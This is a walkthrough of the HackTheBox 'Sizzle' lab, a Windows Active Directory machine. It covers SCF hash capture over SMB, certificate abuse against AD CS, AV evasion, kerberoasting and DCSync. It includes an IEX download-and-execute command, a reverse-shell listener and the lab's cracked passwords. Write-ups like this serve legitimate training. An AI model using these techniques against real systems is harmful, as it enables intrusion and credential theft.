search

Sizzle HTB

IP

10.10.10.103

Lets start with our initial nmap scan

nmap -p- --min-rate 10000 10.10.10.103 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following ports open

21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49667,49668,49676,49689,49690,49693,49696,49712,49716

Lets run a more in-depth scan of the target 

sudo nmap -sCV -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49667,49668,49676,49689,49690,49693,49696,49712,49716 10.10.10.103 -oA Nmap_scan

Results 

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
| tls-alpn: 
|   h2
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-title: Site doesn't have a title (text/html).
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-12-14T00:52:29
|_  start_date: 2023-12-14T00:48:26
|_clock-skew: mean: -33s, deviation: 0s, median: -33s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.99 seconds

from the results we can see

  • the Domain name: HTB.LOCAL lets add this to our hosts file

  • The common name: SIZLE we'll add this to the hosts file also

  • Port 21 (FTP) allows for anonymous authentication

  • Port 80 (HTTP) is running: Microsoft IIS httpd 10.0 Indicating this is very likely a windows machine

hashtag
Initial Enumeration via Anonymous

Port 53 DNS

Let see if we can perform a zone transfer using dig

  • No results (failed)

Port 21 FTP

Since anonymous authentication is permitted within the FTP service lets see if we can find any juicy information

  • authentication was successful

  • No information within FTP

Port 445 SMB

Let's see if SMB allows for anonymous authentication

  • successful

let's list the shares and see if we can find anything

  • Department Shares seems interesting lets see if there is anything interesting there

  • -M to specify a module to utilize

  • spider plus: will crawl the smb shares we have access to and jump what they contain within a JSON file, then this JSON file is saved within the /tmp/cme_spider_plus/<target ip>.json

lets clean up the JSON file so it is easier to view

results

  • Dont really now what to make of these

  • Let use smbclient and enumerate further

we can see quite alot of directories

if we look at the Users directory we can see a list of possible users for the machine

we can save these user to a file and perform some bash kung fu to clean them up

Lets mount the Department Shares to our local machine for ease of inspecting these files

Letts see if we have any write access within the share

  • for this we can use the tool smbcacls: what does it do

    • Set or Get Access Control lists on a NT file or directory names, essentially we can use this tool to check for writeable files and direcotries within the Department Shares

Once we run this script

we can see we have the following write permissions

we can see

  • Users/Publicis writeable

Now if we can write to a directory there is something called SCF (Shell Command Files) files, this is a good blog to brush up on https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/arrow-up-right But essentially its a shortcut file in windows that allows for the execution of specific commands or scripts when a user opens the directory the files resides in, Now how can this be useful to us

  1. We are going to create a SCF file that will attempt a SMB connection to our local machine which we can capture a users password hash, our SCF file should contain the following

  1. we are going to place this SCF file within the writeable directory Users/Public in the SMB share, cp file.scf /mnt/Users/Public

  2. when the user opens this directory this should execute the malicous SCF file and attempt and smb connection back to our local machine from which we will be running impacket-smbserver.py and capture the users password hash

we wait a few minutes and we have the password hash of the user amanda

Lets crack the password using hashcat, quick tip as we know this is a NetNTLMv2 hash we need to find the correct mode for hash cat we can grep it

Now let's crack it

we now have the password

For good measure, Let's see if any of the files residing the ZZ_ARCHIVE Contain any data

Lets use create a bash script that will check for files that dont contain null bytes using the xxd

  • returns nothing

Port 80 (http)

When we navigate to http://htb.local we can see the following

what we can see is

  • we can confirm that it is Microsoft ASP.NET framework

  • it is a windows server

if we look at the page source we can see the following

  • pretty dry

if we navigate to http://sizzle and http://sizzle.htb.local nothing changes within the webpages meaning there is most likely no virtual host routing

Port 443 HTTPS

  • Nothing new

Looking at the certificate we can see the following

  • if we look at the common name we can see HTB-SIZZLE-CA which is a certificate authority, meaning that it is likely someone configured a certificate authority on this box which is interesting

    • We can see when it was created and when it expires

    • 03 july 2018 - 02 july 2020

we can perform some dir busting using feroxbuster to see if we can find any hidden web pages on both the http and https

  • While these run well continue with our initial enumeration

  • Found nothing interesting

Lets check if there any virtual host routing when we navigate to https://sizzle and https://sizzle.htb.local there is no changes to the web page,

  • no virtual host routing on both http and https

Port 135 RPC

Lets see if we can access rpc anonymously

  • failed

Port 389 LDAP

Lets see if we can use an anonymous bond and perform a ldap dump using

  • No data returned

Lets check the namning context

we can confirm this is AD by the default configuration of AD

We can test if we can search for anything with an anonymous bind

  • which fails

hashtag
Enumeration Via amanda

Now that we have the user Amanda's credentials, we should continue the enumeration process.

Since WinRM is open we can try and gain a shell with evil-winrm

  • No luck

SMB

Lets see if these credentials work for smb

we can see we can authenticate to SMB but we haven't pwned it meaning there is still work to be done

Lets list the shares we now have access to

we can see we have read access to other shares now

more particularly the CertEnroll share we will visit this once we have checkout the other services

  • using amanda's credentials amanda: Ashare1972

  • we can access the Microsoft Active Directory Certificate Services, Now what can we actually do with this? and what is it exactly?

what is Microsoft Active Directory Certificate Services?

  • Active Directory Certificate Services (AD CS) is essentially a role within the Windows Server OS that implements Public Key Infrastructure (PKI) services. PKI Involves the use of cryptographic keys and certificates to ensure Communication and authenticate users (hint hint) and devices, its main goal is to ensure confidentiality and integrity of data

How we can exploit this?

  • essentially we are going to generate a certificate, we are going to use CertSRV to sign our certificate as Amanda, Which should authenticate us when we are PSRemoting into the machine

Steps

  1. Generate a private key using openssl

  1. we want to generate a new certificate signing request (CSR) Using our newly created private key amanda.key

  1. Now we want to get our certificate signing request signed within the AD CS we take our amanda.csr copy it

we want to click on Request a certificate

click on advanced certificate request

Now we just simply paste our CSR into the saved request

  1. Next we can download our certificate

Now we have a certificate signed by the Certificate Authority, using the amanda user, which should allow us to authenticate to the Domain Controller

Now we can utilize our new certificate, and key and WinRM into the machine, quick google lead me to this https://notes.offsec-journey.com/enumeration/winrmarrow-up-right which essentially shows us how to authenticate to winrm on port 5986 (https) using a certificate so steps

  1. We want to download the following script https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rbarrow-up-right

  2. Make some modifications

we now have a shell on the box

Now we will continue SMB just to finish our enumeration processes

for good measures lets perfrom a password spray attack and see if any other user shares the same password

  • No luck

Lets check out this CertEnroll share

we can see we have the following files

  • Lets download the contents

ldap

Lets attempt to run bloodhound and see of we can pick up further information about system specifics

  • we will utilise the bloodhound-python

lets open bloodhound and inspect the results

Once we have bloodhound open its always good practice to mark what users we have owned

amandas

  • groups

    • USERS

    • DOMAIN USERS

    • REMOTE MANAGEMENT USERS

when we list all of the kerberoastable account we can see something interesting

  • this indicates kerberoast is on the machine, must be running internally possible, well keep this in mind

Does this MRLKY have any thing we can utilize

  • when we look at the users First Degree Object Control we can see the user MRLKY has the following rights to the Domain Controller

    • DCSync

    • GetChangesAll

    • GetChanges

  • Meaning if we can compromise the MRLKY Account we requests data from the domain controller (NTDS.dit which contains all the domain users hashes)

Looking at the reachable High Value Target we can see our user amanda can CanPSRemote to the SIZZLE.HTB.LOCAL computer, knowing we have a kerberoastable account MRLKY , we can possibly compromise the account and from here as the user MRLKY perform a DCsync attack and retreive the NTDS.dit file, from here

Lets perform a ldapdomindump for good measures and see if we can find anything else

  • Nothing new

hashtag
Priv esc via amanda

Now we have a PSRemote session on the target server, and we know of the kerberoastable user mrlky we can load in powerview and perform some kerberoasting

Lets load PowerView.ps1 onto the target

  1. start a python3 server python3 -m http.server 80

  2. Download the script and execute it IEX(iwr http://10.10.14.7/PowerView.ps1 -UseBasicParsing)

What interesting is that AV detected this, we also try and download the file without executing it and we get a permission denied

We can see the line

  • Cannot create type. Only core types are supported in this language mode.Meaning we have limited functionality in PowerShell

  • ScriptContainedMaliciousContent meaning we have AV upon us

We can check our current language mode in session

  • $ExecutionContext.SessionState.LanguageMode

Lets handle one thing at a time, current objective

  1. we need to bypass our current language mode

  2. we ned to bypass the AV and execute PowerView.ps1

Bypassing Our current language mode

Plan A

Lets upload a nishang reverse shell and see if we can establish another shell without the language constraints

  1. once we have moved the Invoke-PowerShellTcp.ps1 into our current working directory we want to modify it slightly just to bypass any AV that may pick it up

  • Notice we have deleted any comments and change the function name hopefully this is a basic AV and we can execute this under the radar

  1. Lets set up a nc listner rlwrap -cAr nc -lvnp 9001

  2. set up a python server for our target to download it from python3 -m http.server 80

  3. Lets use wget and see if we can download the file onto the target

Now lets utilise powershell version 2 and run our nishang script

if we look back at our nc listner we can see we succesfuly gained a reverseshell to the system with FullLanguage

In our new shell Lets set our self's up for a kerberoasting attack

Lets continue to enumerate the system as amanda and see if there is anything else that could help us

lets see if we can find any text files from the C:\ Directory

  • Looking through the output we can see something interesting

within the C:\Windows\System32 directory we find the following

file.txt holds the hashes for the users within the system

  • Dont know if this is suppose to be here

  • But lets try and crack them anyway

Lets clean the hashes

we find the password for mrlky: Football#7

well keep these in find but there has to be another way of priv esc

Lets continue from our new shell as amanda

we can confirm mrlky is vulnerable to kerberoasting by querying the SPNs registered in the AD by

we will utilize PowerView.ps1 to perform the kerberoasting attack

  1. First lets load in the PowerView.ps1 script

  1. Now lets create a PSCredential Object$Cred using amanda's credentials

  1. Now that we have a PScredential Object created we can use amanda's credentials to communicate with the kerberose service and perform the attack, we can use the

We know have mrlky ticket lets crack this

Couple of quick tips since we are using vim as our text editor we want to remove all whitespaces and new lines we can do this by

once we have copied and past the hash

  1. :%s/\s+//g

  2. :%s/\n//g

Now we can crack the ticket hash

And we have the credentials mrlky: Football#7

Since we now have these new set of credentials we can repreat the same process we did with the amanda account and create a certificate

Now we can modifiy our winrm script again but with mrlky key and new cert

we get a shell as the user mrlky

Since we already know Our current user has DCSynce to the Domain controller we can simply run secretsdump.py from our local host

worked perfect

Now we can test the administration hash with smb crackmapexec

Now we can utilize wmiexec.py and gain shell on the system

Now we have a shell as administrator on the target machine

PreviousSilo HTBNextTally HTB

Last updated